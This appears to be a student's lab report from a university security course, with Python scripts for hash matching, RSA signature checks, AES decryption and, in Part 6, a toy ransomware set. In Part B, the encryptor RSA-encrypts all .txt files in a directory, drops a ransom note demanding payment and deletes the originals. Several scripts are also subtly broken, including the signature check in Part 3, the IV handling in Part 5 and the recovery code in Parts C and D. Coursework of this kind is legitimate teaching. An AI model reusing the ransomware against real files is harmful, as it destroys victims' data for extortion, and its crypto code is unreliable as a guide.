

CSE3140 — Lab 3

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Deliverables

Part 1

In order to find the file with the matching SHA256 checksum, we wrote a short Python script to iterate through all files in *Q1files* and report their checksums:

```
1 import os
2
3 h = "04
   ebf0f4fe539ed72643bd01546aeaf372fdc1bd558e92afcc8c6078d4e5becd"
4
5 print(f"Looking for matches: {h}")
6
7 for file in os.listdir("./Q1files"):
8     if os.path.isfile(os.path.join("./Q1files", file)):
9         sha256sum = os.system("sha256sum " + os.path.join("./
   Q1files", file))
```

This script found that *disesteem.exe* had the matching checksum that was in our *Q1hash* file.

Part 2

In order to find the file with the matching SHA256 checksum, we very slightly modified the Python script from Part 1 to stop and report which file actually matches the checksum. The script is shown below:

```
1 import os
2 import subprocess
3
4 h = "5
   c01e943db42684800123d6b1598c7e9efbc8e9050becaec1c4536f6e1c50907
   "
5
6 for file in os.listdir("./Q2files"):
7     if os.path.isfile(os.path.join("./Q2files", file)):
8         sha256sum = subprocess.check_output(["sha256sum", os.path.
   join("./Q2files", file)])
9         if h in sha256sum.decode("utf-8"):
```

```
10     print(f"Hash matches file {file}")
11     break
```

The script found that *appelidage.exe* had the matching checksum that was in our *Q2hash* file.

Part 3

In order to find the file correctly signed with the given private key, we wrote a short Python script to iterate through all files in *Q3files*, and verify each of their signatures against the known public key's signature. The script is shown below:

```
1 import os
2 from Crypto.Hash import SHA256
3 from Crypto.PublicKey import RSA
4 from Crypto.Signature import PKCS1_v1_5
5
6 key = RSA.import_key(open("./PublicKey.pem", "rb").read())
7
8 for file in os.listdir("./Q3files"):
9     if os.path.isfile(os.path.join("./Q3files", file)):
10         with open(os.path.join("./Q3files", file), "rb") as f:
11             data = f.read()
12             digest = SHA256.new(data)
13             try:
14                 PKCS1_v1_5.new(key).verify(digest, data)
15                 print(f"Signature match: {file}")
16                 break
17             except (ValueError, TypeError):
18                 print(f"Signature does not match file {file}")
```

The script found that *monoclinic.exe.sign* was signed with the given private key, and by extension *monoclinic.exe* was the signed binary associated with the given signatures files.

Part 4

In order to decrypt the given ciphertext, we wrote a short Python script which utilized the given AES encryption key in order to decrypt the file using the PyCryptodome module. The script is shown below:

```
1 from Crypto.Cipher import AES
2 from Crypto.Util.Padding import unpad
3 from Crypto.Random import get_random_bytes
4
5 file_in = open('encrypted4.txt', 'rb')
6 iv = file_in.read(16)
7 original_data = file_in.read()
8 file_in.close()
9 file_in = open('key.txt', 'rb')
10 variable = file_in.read()
11 file_in.close()
12
13 cipher = AES.new(variable, AES.MODE_CBC, iv=iv)
14 ciphered_data = cipher.decrypt(original_data)
15 print(ciphered_data)
16
17 file_out = open('Q4a', "wb")
18 file_out.write(cipher.iv)
19 file_out.write(ciphered_data)
```

```
20 file_out.close()
```

The decrypted contents of the file are shown below:

```
1 triumphum  
2 roughish
```

Part 5

Same as the previous part, we wrote a short Python script to decrypt the given ciphertext using the given AES encryption key. The script is shown below:

```
1 import os
2 import sys
3 from Crypto.Hash import SHA256
4 from Crypto.PublicKey import RSA
5 from Crypto.Signature import PKCS1_v1_5
6 from Crypto.Cipher import PKCS1_OAEP
7 from Crypto.Cipher import AES
8 from Crypto.Util.Padding import unpad
9 from Crypto.Random import get_random_bytes
10
11 file_in = open('e2e2.txt', 'rb')
12 iv = file_in.read()
13
14 original_data = file_in.read()
15 file_in.close()
16
17 file_in = open('.key.txt', 'rb')
18 variable = file_in.read()
19 file_in.close()
20
21 cipher = AES.new(b'\xb9E\xbd\xce\xaa\xb1F\x13L\xb6q\x9b\x86U~\xe4',
22                 AES.MODE_CBC, iv=iv)
23 ciphered_data = cipher.decrypt(original_data)
24 print(ciphered_data)
```

The decrypted contents of the file are shown below:

```
1 apterous
2 neurosarcoma
```

Part 6

All of the components for Question 6 can be found below:

Part A

```
1 import os
2 import sys
3 from Crypto.Hash import SHA256
4 from Crypto.PublicKey import RSA
5 from Crypto.Signature import PKCS1_v1_5
6 from Crypto.Cipher import PKCS1_OAEP
7
8
9 if __name__ == "__main__":
10     key = RSA.generate(2048)
11     private_key = key.export_key()
12     file_out = open("d.key", "wb")
13     file_out.write(private_key)
14     file_out.close()
15     public_key = key.publickey().export_key()
16     file_out = open("e.key", "wb")
17     file_out.write(public_key)
18     file_out.close()
```

Part B

```
1 import os
2 import sys
3 from Crypto.Hash import SHA256
4 from Crypto.PublicKey import RSA
5 from Crypto.Signature import PKCS1_v1_5
6 from Crypto.Cipher import PKCS1_OAEP
7
8 if __name__ == "__main__":
9     public_key = RSA.import_key(open("e.key").read())
10     count = 0
11
12     # Read each file in the current directory that ends with .txt
13     # and encrypt it
14     for file in os.listdir():
15         if file.endswith(".txt"):
16             # Read the file
17             file_in = open(file, "rb")
18             message = file_in.read()
19             file_in.close()
20
21             # Encrypt the file
22             encryptor = PKCS1_OAEP.new(public_key)
23             encrypted = encryptor.encrypt(message)
24
25             # Write the encrypted file
26             file_out = open(file + ".encrypted", "wb")
27             file_out.write(encrypted)
28             file_out.close()
```

```
28
29         # Write the note
30         file_out = open(file + ".note", "w")
31         file_out.write("This is a ransom note. Pay $100 to get
your file back.")
32         file_out.close()
33
34         # Write a unique identifier number to the file
35         file_out = open(file + ".ID", "w")
36         file_out.write(str(count))
37         file_out.close()
38
39         # Delete the original file
40         os.remove(file)
41         count += 1
```

Part C

```
1 import os
2 import sys
3 from Crypto.Hash import SHA256
4 from Crypto.PublicKey import RSA
5 from Crypto.Signature import PKCS1_v1_5
6 from Crypto.Cipher import PKCS1_OAEP
7
8 if __name__ == "__main__":
9     file_in = open("d.key", "rb")
10    private_key = RSA.import_key(file_in.read())
11    file_in.close()
12
13    # Read the identifier input
14    identifier = sys.argv[1]
15
16    # Decrypt the identifier
17    decryptor = PKCS1_OAEP.new(private_key)
18
19    # Find the file with the identifier
20    for file in os.listdir():
21        if file.endswith(".ID"):
22            file_in = open(file, "r")
23            message = file_in.read()
24            file_in.close()
25            if message == identifier:
26                # Decrypt the identifier
27                decrypted = decryptor.decrypt(message)
28                print(decrypted)
29                break
```

Part D

```
1 import os
2 import sys
3 from Crypto.Hash import SHA256
4 from Crypto.PublicKey import RSA
5 from Crypto.Signature import PKCS1_v1_5
6 from Crypto.Cipher import PKCS1_OAEP
7
8 if __name__ == "__main__":
9     encrypted = sys.argv[1]
10
11    decryption_key = sys.stdin.read()
12
13    decryptor = PKCS1_v1_5.new(decryption_key)
14    decrypted = decryptor.decrypt(encrypted, None)
15
16    file_out = open(sys.argv[1].replace(".encrypted", ""), "wb")
17    file_out.write(decrypted)
18    file_out.close()
```